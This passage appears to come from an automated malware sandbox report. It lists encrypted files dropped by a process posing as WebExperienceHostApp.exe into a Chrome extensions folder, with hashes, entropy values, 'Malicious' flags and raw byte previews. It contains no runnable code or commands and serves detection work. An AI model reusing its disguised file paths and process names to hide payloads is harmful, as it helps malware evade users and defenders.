SHA1:	5730ECE75ACD467C15B903EB3A6F0F1F0D68A980
SHA-256:	D9CD39A6758F46C444D66986F104D065DA0EF8FC6A571FB2BB65F1E8C71E3208
SHA-512:	DF12FDD02BEABC9166177C98FD3806D72A692DE9DD6C84DC00EF586D70275100D171653F92F93B49F98ADEE38E0CEEE569E807AE2D92FB1C1B147EEDC67F68EF
Malicious:	true
Preview:	4...k..2%.+^...D.....P.udL.71.=..f..\|..J..3.;8Tu....h...KW..T9..=+>r...<.D.sv.^....Ar..`.0.....N..t.Q..upE..0.YJ........ ...w....'. ..H...b...u..C......O....q....GX....J.#..W.+mE..k.)Da]h....6.[L.P..>..:.v!s...$.t......L.s.U.#FM..D.6.F..7.#.4T~........?Q.[r.0....o#......L..uCp.q9...hX...wE]:f(.....ne.7..s.cb...W.F%-...._:.3....(.RO.1.1I@eZ..z.`Yyh...I.."..D3..K]........?.j{...........7q,.}...2D...p..#..(b.#.`...S...7T.....c.$.T.jO...'+..0W.p.xT..ix(L..e-..\.}.........6..%../VW=.:.....1?.%....yd.....=b `.J.)x..h..FaC..u.y....H....9B.V.8...%.B.w'j..{.D.`.B.;.3........G..E..........$!.....R.(.Rg.g...;....ZI...H......j.#R..;..1...`.&J_...&.-."....r....T.y...M...X...o.....(....w.$.H...&@e.......E..xH...8+../b.qA.-.....u:.~..R.LU{Z}.y.t]..H.x\|.....x^..s..q...\|(.1...C......X....z..Y)Z9.&}a.c.]...Sr..I.N............:Y...D.Ug....R.....>.w.o..u..a-52..1$..X...h......H..+A...r.......k..k.A..[\.}.E..s_%......;D.\|...j..M...[-.f1.....v...m...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.60

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	56461
Entropy (8bit):	7.9973880039265675
Encrypted:	true
SSDEEP:	1536:CD2zlLmcFQF5cnac2DeJTwKHw0JVFA2p3N9hnxvsuNTOSr:CD2hLvev6a7CuKHPJ59dxvso
MD5:	7242A3104ACC425C97B62C10DA4E3A79
SHA1:	D2F43A6E2BCFB8296F1ED44CA98F1D42A25220C5
SHA-256:	C6E28AFB64F733D0B2F549E3FE0EB6BBED2B278434EA3CFD136569AD7B067356
SHA-512:	79CC62F151B90B998481B98FA01E8B64BF691D633B68FDC8E3D69EA89AA3CAB255682289905D75E13D3A15C80DE482C2C0F2B07CE8E7903E7D30F9DA5AB0FFEB
Malicious:	true
Preview:	>..=..F .X\wK<w.0.!S....Q..........G6...........r.=.j^,..M.....&..\3@.zrC.Q...5~....j..!.. ..uS.....~.c....P\|..Z.b..P./....G..._.t.#8.4K.JQ.C.T...p..!D?...^..].....X[..f..sz..2.eP..:r.NW...z.h.Oe..'D. O........H.D..$.e..$\.o.Z.%..+...IR....^v..P...PV...!3.[?9].o..v....p.].9...1.E.......i&.../..q..!..)6x!.....u)z5........O....Jp.gO..MI?.9.+.....MUaW5.t3.4..L......y...\|....=GR)....W....#..}T..e..x-lx......Tb..&1mn..n............Sz........q.R...0..y....E...A.d.......I......S.B.U...D...dX...dsu.7j.t...`..%`.O+z....C.f......WT..V.:..T%>G....[y..\|...8...[....4....P......grv._].M..`..D.U......A..._...z.e'Ye.9.d.vwz.....h@.v.M+J.q(....G>\|...?.Y...cFO.<.......2\.`.q4.D.".5.z/......wDS2U.......\|..R(..b.=...X.=K&Y...my.z....}X'v..~E.t.8jN!.ZDe7..'qX....NU.8..r).G...(/..].X"M..6..\L++..m........[r..]7+1.e.....`kh....08V....^k\..........8...k.@zi\|a...G.......).,G}...rk..?.Vp....+...Z4/YEF]..Q.1.{..}w.gOpU.;.8.t.R.AQ6..Y.}...K.%g.{......4

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.61

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	34458
Entropy (8bit):	7.994608566259596
Encrypted:	true
SSDEEP:	768:stH0VMSW6/XZqPtTg0NCEPpiiWtB0dkXir7Cr:WH06SDfcxgcCErWQ3K
MD5:	605B5BB77B2DF67A265DB36D7CCCB5AA
SHA1:	CA4CED1C839094E152B1D92DB49F68B5DBEB06FE
SHA-256:	885511827F06E769EBB3B5F94CA57EEB6AAEE2D220F2EF5EF704214439BDE4E5
SHA-512:	1CD218A976F8F9F9115829C6DB692525AA63C16887C0EE1B5A862AF53FD3B381F536E634D6156D740C23D9B3502752039D30A2148E6187311F9D08C442CE2D36
Malicious:	true
Preview:	.^.0...NB.."#..R3._@.9.Px_.N?5...=.h...q...Y%hf...a.w.L....oxU..I...~S....".<P.g..^....F.0lK.....U......f.:.....B).TSK.^...u.SRM..f4D......".._.u.C....ui.ZN-......L..[Q.o_36%.V:..U..8....Z.q..Z.wS..I'..<..f.t...`.......Q.........."&.q.."5.'.Q..38.q...F( ..3..-.\|&wz...P..%.....(....Hd...],...A.t..I)..K!7.E.r...i[.j.!A\|.Vp.X_.F?k. <w.0......%..\}.-.u..W`.}..._(.D....Y......5b./ WS......u....j?X>..1....m{39...>...P3.d...0.;e:.A...y.M%k#mG3.OE.5J\7..^__.:&.6..~...@...~..f\|....+-....6...]....U]'..N.Y..a.t.../q@..R.Vz.!.5(P....#.o.+i.n.3{.+. ..]!.}77.c."pz..T....A...>].2<&K......?.x&#..F.a&..D.}..K.E.y.@...8.3........nu.............R"x..KIK..h.t.........\|..!..R.f.US(.]..h..d...8s.......;..5.7..d....x.z\..4L..,P.Q..-....g.;."..Y\.........:,.FS.b.a..<....f......d...}..H.$...>.N......3..T...........@.9.."...#(\|.S..>."..}..eS........."....^Oy..\.5.1.:.y...jPK0.p.6.h.v..ksW.A.8.Og.K.:S&......}dBL..@.^..W.<.8..&..igC0..7'EN.LA....L.0< .v.J......o.cO!

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.62

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	96121
Entropy (8bit):	7.9979860190229894
Encrypted:	true
SSDEEP:	1536:RU+PC4brdG9pEmgUG5Al8jeEmMixaQ9y4VgpHie4rhWkMv+p0kj5BvlQAHHsJY1q:pKARmg95VeEmM9AgpH94oJvyvm2HsO1q
MD5:	8811940B4AE111BC3436759A042BBB2F
SHA1:	18382C1AC22D41C949E6365C5187BA9AE5646BAE
SHA-256:	FD7391BDA37AB38C9DD40FEC4108227D704EABC223612C2FAF15E54E4258DF62
SHA-512:	C95A961AB1CE706CB5E5670F953AACE419432A50D19822F0FCC5D76A729F9BEE652E26E82DFD4AB3ED2B49CDB099CAECEDFC92F7CBF9C6B82ED6C7D8E73C6F3D
Malicious:	true
Preview:	.G...lK".]+.j.-...i........e....Bu[.{...v$.........f.=...td].... ...Bi...U,......_.y1n3...t......(.....D;.z.&.P..!...6...,2V.v..0.F.R.+...--u,.{...oT........bk..sIRQ......;...3.q...e..<...1W.........7....6;.3.3.,a?SYz......'...a......@.[..n...M...O!,...H.4I.;..:...>..DRq. ...@8..i+........u.....b.T...9..Z...R.!....j.....$..5....y.[.....2h.v{=.d+.5.8.wk..62...[sI.H.f......+.......7..s.P.lg:......R....uJ#-.....D......l......~.3..pJ'S...v......i,a`e.T...<......C...R.....X.......G.....zY3.9d...g'!.E...I.KD6.9.."...~3\|.UZ..%...V"...?.Q....v\.?1a.wEn.......K.E..F..S-.Q./....E.s...m.t.l...q].5.r...dw..dP...?<..zqs^..F,.J.us&.......&._...xY\|..X.bh.l.4_v..B.[@>..qa...1.E.p`..bSF}.20.j..C.x..31.8......&%...@wIK...R`:......V...^_..L<.-.9...`..a..dU..!.~....l..`..u}G)c>A.^.d.L.........%!%.<.....Ag%..3....&.....@.....!`.d{..'b..X.&..;S.. ..`.%^.BKX..6.....X+...BW......Q\|<.y.c.E.L.1.%i^.).....n..z.n.....o....wo......D..1I..:..k..i.....'.U..H.d7..Z..K....B

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.63

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	35512
Entropy (8bit):	7.994321599527247
Encrypted:	true
SSDEEP:	768:oMd42bKNKN0IDSDcJs6kk6Lqdv3Du7PyjF7pRqa87Id2xs3Mk:oMd4VKQcJTkk6KrubyjFNoand2s3Mk
MD5:	0F582725109BFF986077F06A66BC3CFA
SHA1:	FD7C87BA4AF1E86A49517B0BEB7391F2431EDC30
SHA-256:	A992070D0852DFC3744F918A4BEE76059242E061CB64FD4E36D326A57721B9D1
SHA-512:	DCC551DF2EF59E9F1847ADDEF34F674881255EA2F7DF4A503620697FCB84AA1C9D76D9D39C3C8AC816613FB106A637A800C5E0B03274D85E5A8313506FBDBF19
Malicious:	true
Preview:	m.....5.S .![..=jI...<..Y....u..+...!...r@T..X.Bv...s...d.F..L?..@..$.........Ky'f.....S.n{...'.]..h..ucD.sL...B..@$rQ..'+b>..VM.P+............k....\..C..O....\(0..+L..?.E..>.+y...M..b]`8...-..pl....C..?...}G.nZ.....O(P.V#...<.[...p.R.>..OS.:.:\|.:..w1.j..R....b.lE.4e!.H.oRfjY..!..8.F...3.b=!x..}..0in..`.@....;..."b.1.......r...#.D.Z/......P.6.g.5..q.9..'+.N "..L.\~..{.N.Z.......qn..2hZU..C..<.PF..F?.'$s\.>.n.l..5..f.@.>...J0.....WA.nF.k...n.6......%....O.E.n..[?..T.....H.....Q..._@4..P...h...S!.=9Y..6....V7B.".,~j..I.....:B.8).I....&........NG.pP.K9...\|l3.u...&.Uf\..7.7...v`..L_....rk$.l........]4...MrxT..).[\|5.[.w... ...=o...D#.". .e6..x...0...N......E#....Q%.W(.6Z.P...(.X..ov...)%/........!`~.`...qh..)........s....A.-4....t0........j.k.`.X..a..+...z#..1/G.......B..y.g..l<..#.....s.>.\..\|.'.{....H...k...y..6.2...t-_K.8:J....*...(...p.B..b.1...H[.....G..y..s.K.......N....b.R.hk%a.NA..(\f...AD\....f0u.g +..R3.}....iW..)#.P...b....'

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.64

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	98730
Entropy (8bit):	7.998158650143007
Encrypted:	true
SSDEEP:	3072:mkrRUrMcuPu8qpmngaG0sJTIEmNkvmyvrpYYdMZ:mkrGInipXaGnJcEmNk+yTpjd6
MD5:	A5920A16E3A4D8BD258F31BDF311A50C
SHA1:	BEBB2736063952DD2079D7E2E3AEB509EFE06717
SHA-256:	1FBAD5686B5F0B61C2B1C81C15F66822A8B2AB9ECC0D1A85D939D3BF52E49BE4
SHA-512:	543322373B74BAB8848C061C3ADD3BEF86EFBCF5E78A0279F2DABFD1DF5892ED33C1CCC42A2957F6CC910D50ED21D65B506E1D8D431EC19CCEE9E1FB5827467F
Malicious:	true
Preview:	..b.......^.(...F.H~\......R........vu.,).>..7S... &.z.[..`i../... S.....~...K5...S...v.O..#,..2.Q.....)U..,!.U7...y..-...3..>.-KeG....tn"2.....D^C..;L.OJ..!......j...s.....H.g.yT...Z.p.D..SJ.....6.1[/._.+..GO..~..$..6N.....f...^...H....2..)m.0.'F...X.J...e..dt..].R......5..B[._.J9..X#\...h.GLP.9.d.^W..>4..M...0.P.13-..eW ...?.....6..+r......V..n5.>HN.U_2...M.D.w.y.B..n....I.B.D....7..~..0..+.M..-....Z..2..p...5>....M............T6;.......{...5....f.#1c."...%..y...J`....P=..^.D..Y.F.....&_....Y.(..S..4...!.5..t.....R.oA4@k,.2..m.2..o:.#...R<....`y.%ag....0.9 5.......!%@5.]..h..._....eAC..OGD...B-x...OdrA'.q.0=D.....G.B.~..PT..."j.......G..$d~.'...,..>....Iiy.+0..l...:;.;...Sl....h....U..B.%.......rr.Q[...kz..g.k.3%.6&t.n.c{.GY..../-..\.E.....T'.<..w...yz..;.0$..p....QJ..?K.]....Y............1......J...b...\.....5:..U.v..E ..R..9Z...Z..~wK.1w.l..^ ..{.....cG5...uI)lG c..M..3..C*u..qd..B.n....xOk...&..Y.PPN09.t.<x..Uc...{...z......PNd&.oWjh9

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.65

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	52378
Entropy (8bit):	7.996225673406002
Encrypted:	true
SSDEEP:	1536:Q1mh8GvTNy+JPVV2vHvKhOoy7o0YPwxH2EHv9:L8iy+p2fps9+H71
MD5:	1F9B104F05B24DF2BDD78E9AFB812697
SHA1:	CFCD528609AC1E21737FD95032676C3055F752EF
SHA-256:	525C53598F3ECC45724192BBD9FCCA0BE7404F561BB205B183E42F829C84F6E5
SHA-512:	9E0CAA49E9A4780B51DC12E08DAAD5A803FECA1D324F792E0754A5C26A5FD807E9BD6122D39D966214BD717CEBECA305DA20FC309EABFC22469073CD95D1B628
Malicious:	true
Preview:	c..4E.....uD..OD.l..w..:..........j.lD..z9.S...G...Cg%.../`...2Y#..N.\|U.n......T.z.;mS...9.W....G......>j..`.)10 ..,G..{.se.......Q.:.>..o.E......SK/.......gC.N..]!.w.<w6..0F..2.&....oG..y...V..Gp.3...P....#..YS...v...{...v.>D..W..A.....:....nU.6..y........O...k.J.@..Z.........`..I$V.\|.R....V.R......uN....=.._5A..tU).x..j.6r..x.e.$.j.?.......k.\...GC[....o...D..!.......e.=.....n.......E..SoB5...D2..1,..^7.....0...mHQ....hO...0tO.H...\.].t...:.=...Lo.;!..(...b..0;:@5.\|.A8N._........F....W8.X.D9P.."3u\..$32KE.^@.W..Z./.}.f?.bc.c....6.l8..b[q..e.R..~../...W..{...p..F... .C.......'.$.........\|..m.%.:...&.h...(G..>Y.........8..%.=...:jw...#........g.....u..Gn.*..".J.....Il.u..:...."..........S.x$.-...?.e.\|.9......}.2.$q....9..p..g..(mb.:.E...\.Dr.x5...!3..8d..b....;-...7..f<..w~....S. .......7p.......l......-{D...S...\|U..".xy...\|..g&....crGu$h.@6L.L..k....G..}6............I.A.,9.}.....J7r......g..5H.......?Q..Q....../$..3.....Ib.0G.......>.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.66

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	35271
Entropy (8bit):	7.995110529395509
Encrypted:	true
SSDEEP:	768:f2R9YAR/wPTFXpB0stVwEltGTcRErDurukRdH+dsMBa21CmtBgBybv0:fEbkT5pBx4TcRCurmdmNmtB0yQ
MD5:	8079074AB97D798FFE52192503592B0B
SHA1:	30EFF32FAE6DD482B8D48CDB3FFCB2412545795F
SHA-256:	A35D45B62DDA3D4C9AD2F2EF2072F1B0D3F55D6394F72A8CAA359C05EF0D06DA
SHA-512:	94383F2F5115B7D017696848900EDCB77385FA46F419A8A8EFA73D9E29D9A44E6BEF0BB65ABAA861C80976489AB62D00C53ECF31B80F1080E2562B86CCF78597
Malicious:	true
Preview:	h.G.]7%.~..X.......Se......L...0.D...U...8...`..f..B-E...9m...bF.l..A....Z3..z.a.Z...\...yQ...~]#X.R.i....iT.....!.......(..2Ty.?'v...."\y..b.l"..&;zE../..g....y...#.#".8.N....x.S.=....H.n3?Jn....m...V..Ipy,..P.g...OO...7..@p.?..>...HCK6......(_.L\.Dyf.K....7.Q......j\|.....[=&.3...N0...{21..T...y.....$Z.T.Q...#c8..g..v...Y...A.......O.Lm..K.....r.......g.-.{...4e.^]:."..{e.......e&.O.o.>.d..F.H..~E.L...%..D.I..T..55@B....^."s.\|.^...;.,.:..}'v......<........X..p.mN..r.......}:..........s...nb@ ..i+8.a...[>..L..pq...jh....9.....1.46.8.(.!.....eOh$\|'0....a...E..Ac....yQ..OK..9.m.6~....^.u.B...P.....`."y.X.m...?.....)C?,........%.U[...u./.^#...YD....t....&.G......Y.R!.&^q..M.@Z..!...u>b'.#.fW....U.4(.\)>......G.h.<.<..+.YVz./.~..t.A0.D..A3#j..}..<{(,FV..b[.;d3/eg.a.Ki..{...e........J.,..}...P..M...C..kX.j....\|.>.....T4&"D..r.z.."..?,h.E>.?...F" .ofPz.V`Yer...~8..9.yF(.....%Q...G....mK\..j..V...?.Cs..U..N.L.*.e...UZ.L..y.5.z.E.>O8I.hK.R.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.67

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	68283
Entropy (8bit):	7.997488389296204
Encrypted:	true
SSDEEP:	1536:mfU349V6OAVolG0EQkDLby/Ey4XAfwNVr8qnvKQpkCh:R49V6ODlYNfTy4XLNVrlv/pkCh
MD5:	35177F73CFC118BF96AD2EBEADE20122
SHA1:	EF0CC47A5547F02098B15FEC671DC264127C6A0D
SHA-256:	EEEFBC5F582D597C827E72BF3290BBD581CCD55E8E0E21C8A2671C22CC74E22A
SHA-512:	1AA83A49F96A2DEC198034E92D4591078D17804F529346C1A0C9B5747A416CC555220038CB910325137458AE6670D8E945E6BA20F0A59D86DE66C3EBB481A476
Malicious:	true
Preview:	I.C+\..........9.(p0...b5(...\|....O..)..?.4.........\|mz.Ez.'.\G.F...z..aH2..\eZ&.D.....Sa+.I0.^.4....]`H=Qn9...D.O...Bb"....X..6.+jhUA..F...x...=..2..3"r......2..I.%..c.a [...u/s.S..].2.x...j.........#..y.A.k%.`..K:.....@..V.t..+...TM.'QVI..l.]...uk..i..@#_.:.}..,q-p.K..".Kd...7k...Q5.D@.p.Z.F%.....%....=..SC...Do.be8P8.?..Gp..eK...gk.....O.b.<..,...\...Bj.....-...~..U....vTE..@].t..P.d.-$.{m...Td.k..$dc.....YC..:.'x..vRA.H..'....Va...4....?U..3/............E.V..+.~[<.@.........ct..K\...R.%@...YC.We4.4.AF....J.....).xa.W.q_...t..(...4.U.Se.P.N.\|..}..P..\....g.....DV.{....'.z...g. ....!........f)..td.F#....%./....KRt...9..#gJ......{...Cz..l...o......W.4.R.]........d<.....d........Y......N(.L ~H.+.:....g..vmF..M+g.F..<...w..S#.]..x..&-..J..`.. ..H....k../..6.x.fI.kn......>.Y%)....y9....f.].0.`.A.J`.j..9q....g-....Y.T...<*.18.&.O4 0..U........:.....}..!.U......n...Z..+O. n..<.`.Z...&....U9{....#2."..X-L..P\|./X..y.Y<.@....Z7...R...`....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.68

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	105124
Entropy (8bit):	7.998467327363212
Encrypted:	true
SSDEEP:	3072:NcDRBOWwGNketKJCxKUE/+SSkDuGwIgXdQSDpK:NcD/OW7NkU0UO+LouJhXd1g
MD5:	F431E45DBDBF13968726272A8EF4A5AB
SHA1:	1D2BD43B4DA393DA112AE1C58997316A49C7E910
SHA-256:	9E215300DCB001B6EEFC03A84225D482590BC3AC69F85D90EA8E3C9529018AE9
SHA-512:	1DD618A46CF77963DCFB80275F66B9E5D70FBA4F73543BAA3BA40085C5EC534DEEDF2EA757E793A7219C45EE572F9D3A574C54B381925A986BCD6EA9E0ABFC55
Malicious:	true
Preview:	....i.K.n4..?s>.!........E....H....a.A.+....>.... ....._l..fv..Y...:3...q...2.y.i......-....Y'v.<M.~n.(......5...[....D..ao.....8.....7..................N....."....V.M..c....A.%.^-.3.X.H.8...r.T.].3..wxV.........V(../x.2N]...l.<..<.0N6b4..qx.......s.IV."....Xtxz.w..@=PaW<[.Q@.e.R;.S.Mg>...8?....."..3..wL......W....jq.E..5xti....z.(.l.Y.-#.e...[......+.e+..w..k..".[".x.v.^.^!HrV.S.z_.t.+.<.....t@:.]..f...H.2...\Z...pz.....,-^..3s...[d...6.9.Ux....iH.wk..{....NJ..fWK..K.......\|.t..-Y.....t.T.4.Q....`.R...MScl......O.K6zD/..uge.@8.zs...C.C.6.....S.W.{.....:..!@.^8g.1.l..,\Q.. ........E...~...1...=@M=...g...+a.P.....\3.j....l....mY.U..Dh.u...P...5...$...p//o.."...g.\|.9..q....^... .#8.8.YAR}..t.?..L...Jn......#K.w.+.C.\|.... X.N4..[.q...%.t.Zt..9w../.H.).:..P..:.n....a{...t.V$W..m.7..~.=..2.k.....U.~......S..S..po..EyCc.VZ.m..m.t[_..Y e......;o.on.}...x..S..q^D............d....cr..~.g..f....3...k.W.;..s.:....~b..{h..!.!."R.....2....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.69

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	56374
Entropy (8bit):	7.997015079015027
Encrypted:	true
SSDEEP:	1536:ZUaJoie7dKT1Sid+sS9Itt8wFrFbTJuSpoB+:OH8T15dvS+j8uRzoB+
MD5:	1CE724F1D2F8C62763775BAE2A19FA6C
SHA1:	929DBF551587D5786E9287848126229B2E498DE1
SHA-256:	C69D3D0D15A2414BC71CC45E1ED47D3821D505B6CD089A6DCA5B2CC8F4869081
SHA-512:	3867B205E6034210124B4D0F16448490E7DA6B634ABD4F4AF8B98A879A34E04E18985F97C583556EC21313B000C11C47204546DAA834CC0CCA3B426507D45155
Malicious:	true
Preview:	.;.........z..m.x.U}......tfj^..K.........CD....5Gk..D.:......w.g.....O.....z...;.......3...T..g.t...i...l".....i.t.v.W^.&.=..iw...j-IA.....F...//......\|............Jg.....b..vn}..?c.j.....v2... .PP2.gcVcU..Y.)........... ..w..)..).....y.,H......d#....>.dJ>.c. .]"<.h.\|..iUn.r`.M......d.....`y.s.1...'.)..L....:....xb..R+..w.q.p.-.^.</...{V2h5I5.g..kT.R.m...-B...m;..U..W_.....v.....KZT..qh..c.Z.X.n?.B.....`g.....I..w...HV.....J..HB....?..A8m..r..k.z.D.Ba..;....A.kR,.=...... ...vJv..(..j......w.....9.]\|;qT..L. .............k.{u....Y.7..5.....M.b...IG#.v3R...%....;.B....\|Y..=...K.z.$7^-.+...."..,..EW......fC,Qr.C...`.K...:sr.....D...m..V.0)E.......@.m..F...\..a.....%....6..h..q.X...+=.\|{........Y.0...y^....m..f..^..T%.l>....?.c...")...W....5...I...d...,..4....(...2J....\|t\|.. .fj.Q....zd..%.)-.TI.uz;.........I.p.i.........^;.C.>j..J#...w.6.\|.u_....bg..)X..lkrT.l.t..4....~..BE?.:.ka.,M._..#..!.0..~...4r;?mu...b..~o ...Z..w\|...6..`S}ly.K.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.7

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	89443
Entropy (8bit):	7.9979139839442555
Encrypted:	true
SSDEEP:	1536:uH7NXfr6rZZ1pNQjHMh/JoccM/Gzwecdqu8VDEV0B3WuG6/hOd4Ij9iqwvBLmRRn:O7NP+Z1fQbMNJhf/G8eAqFGCB3P8b9ig
MD5:	640CF1CA12E3FDF0E19ACB8ADACEEE55
SHA1:	11F36F8EA97B7E0036C5C571490F58AFD6024C47
SHA-256:	45B5FDB6E0234FA884594441ECC9A5B7091DEA0D77021938F16F9FC7B93D34F6
SHA-512:	9DA4B5BE8D303491176CA5AC12F8FCF71A5AAA10ECFE8997E857D18EA8876E10110000A412C187655756F73FD544051C32A3AB120F663E001941241BB8D636BF
Malicious:	true
Preview:	%.Sf...1t.:.?...........6.r'.. ._...x.3.M.C...b..c-...9Y...{}rz...W...sQ.ol....(.V..x...{LH(......)f..a..e.&}.u?.@.....".;.d.....in. .]N.....g.3.,..6..Gt....i8......l{......@..J..f.....c...o.F...a..,...5w......g.-&...@.]...O...4#.T.E.f.N........}/.......Iyio.LR..C->Bh.j.H).r.T...@S..$....~......l....<....{LX.....9.D.._K.B[.....n...$V...CH.6....$.Z..~1.e.of.N...TY..E.V...E.]..D.z.U..=.}:.\|.$...]]g^P..t.....jX......5..Q.C..E.=....\..i%.'{u.&b.E...^...&^u).}..o.W... .{S.5..'A@D.\|.k.?..N{.R...Y).&......9..].....V...?.B..s.^T....D.[.)..w.\....Us/j..#......1...P.X.<9r....!p...R.\......84..]..)w{.l......V.;....l).&.~..=y....h$..d.w.....v.E.%{....%....uEy.. 8R......9....3.,b.....R...eq.......p.u.AN7...2-.2h..F...P.N0^.FB.&I~..a...,..(.N8.k..L9\|x.H...P.......CPV...../.X-o.a\|..,e..^..#q.fjI7.J?e..u,...N......K.195....>.'.eg.#..6b.....;2T.'...i....X6.=..9.>.=....:^..#{.w.X./\|..R..j.\|3..Nl..n..N....,-..tTx.q.....r: @{S....Bb..'X..J..,...PVy.k;.K

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.70

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	37237
Entropy (8bit):	7.9946004510102116
Encrypted:	true
SSDEEP:	768:Lrt9dwBFEdL8GtVM5TJQdpuHA7gm3SYb//iT:d9SLYL8GbQFQB7gmCYb//iT
MD5:	33C92B526406EFA85AB5B7EFE3C8F774
SHA1:	4E4C789EF38126110F9B4EA8C655DAC2DAE4DAB5
SHA-256:	6140165A94FAD47C72CDC6DF946C6CF49895E2B03EEE7C356F5AE5A9B913964A
SHA-512:	209281CDD0A5C2B3E34F3B20FAC63D1ACB1563D36B857551652269B8A033DE9036D7F245E65424960C2C0DEA45644AAE8B7B26FB59F98608277B9570844C2EDD
Malicious:	true
Preview:	.[..]....P;....g'../..>.@=..q_....X..............l.....K..y...K....8J.6.z.=.-......k......M1.....s.iN.j....fC{...._=....:WJD....`lV.%.EAN....)PC.......x.m.z`+...<..^d..>.0......7.R^.4...o}...m.. .....^..h..b6.W...A]]..d.L.......Q...k.a.;I.~.,)..@._dAc......;.fU..'...>.........p..?....%.O.[..W.j...&...6W.n.=-T._....c...Le...N=....D..8T;.B.]..5.5q..k.u.........TO..[...8..q...N....>....."..!.A.t..=..d.`.9...(...9.h.._.zs.7..\.P..oh@..X..63..L...h...D..BLu.MT.j..`$.^....l..t$V..Q..f.....s.lY..u_..{.ns..F..n\|.c.....O'...fBC.(.e\|.....d.e.......A..f.L..:.].ku.:@i.~.....k5."-W..B.w.......C..W..s.. ..:.r.\..<#<...K0.Ev.E\.. ..nL..!.q.fO.:N.N...d.A.g......... #Z.1.Cw...r..as..k..#..............B2....I............i.....5..P\|:.cK..3...4d...V..w.fO.M.l.1.QeBL\|..J..e.).k.Wi.e.$.O....%.5j..L..+.A.6N.-.:...s.r..U%I.^.....f.^..*.^..zA....r..HB..........B..X.$...b5z.,q......!E.....@......kR.4A..It}...nQ...s.....?..H.f...O.....HJG/...p.;..V........BT..Vi.5..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.71

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	100030
Entropy (8bit):	7.998056554555185
Encrypted:	true
SSDEEP:	1536:d2zlCeo1t6OmuqE/B1ZpTmCa4S8clhppQHBXBewFUpuDHehCPPdD99FT1ucX:gfAqEp5rclhpGRXF2uDMC3dBj1ucX
MD5:	729D88487AAC4AF729C540798A12AEF1
SHA1:	7FA1514910376234D7D08162632056BEDDADF545
SHA-256:	39FD0A911F378B31EE05EA0D17C54A6377CFE8913AD8345A981A135C9E275526
SHA-512:	7CADA77A38A036E93455166C929CD6EE5CC7FA953D56B472F4ADD62192127E9C27A59408D12705AE97A395D69C8EEA3EE98D0C509D842CE59C538C0DEAB86EE0
Malicious:	true
Preview:	.5.R...8/...eq.fk...,\|.\.2.}...<H..6.o..!.b..pe..}.X.:B-....)...YD;.Z;.b......Q"...7.?.........R..1Wt.._.3......g.$O..!......S.)\|\|.86....[/.n...^...\|$...Yx..Z.../......yyU.x....A._...%.....p.8.o$..Yz..y.....7..C.....y..F./..XK....v.. _O,.wQ...\>94${........T!b.t.+;rK.....+.d.@_K..._.5#...9..,=.M..Jn..#....sf.....V:.... .PPGJba.........q......c/..3..cV....~x...X.XQ<H..0 ..k....G..q..g.qX..f..Z..>.3.5(/.I.oq.\..\1.a5........#.........T..m ..X.xZ..RA..x;D.B.8..v5G.R"...L..C6...9..92lw'.3..Y.-Jh.fY..A...Q..A.....@.;^....Vp.b..@.P...5.....f.B1.`r=w..p..e...X...Qx....D&.~..e.....a.z.D..\......X>....$.o..;..:...4...... ......L......t...w.rg..s@......=...N......&.S.Us.......j"..)P+..F........)6...D.H.C..pL.......(.P.XX.[..=X.F.v<.uG.._p../..E`q.S..O.,..`Y.#.Q....A..&...f....G...s].....0..V7.X.Jt............l..z.....VBFi......\|.....TI.t.........&.7s..N.4.E.!.&..-...`qtB..m...j.O...C..T.{eKJVV...Z.D.rvi..7..b....7.y..V..a~....W.p{.Y..rS.n.8..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.72

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	31722
Entropy (8bit):	7.995285181282859
Encrypted:	true
SSDEEP:	768:g+MVmtBfa1xKkbCy1AkKwaTZ2uWQNaCsW:g+tMxR3UZyQsCsW
MD5:	4CE2489178807770BCC16A577DAB619D
SHA1:	8F4A35028E813C81AEEA69A5B1C869F8A0DA80D1
SHA-256:	0517C5B0583A8CE9E06C8CC49E52C5B5407C555CA592F9B4E8229C0179878503
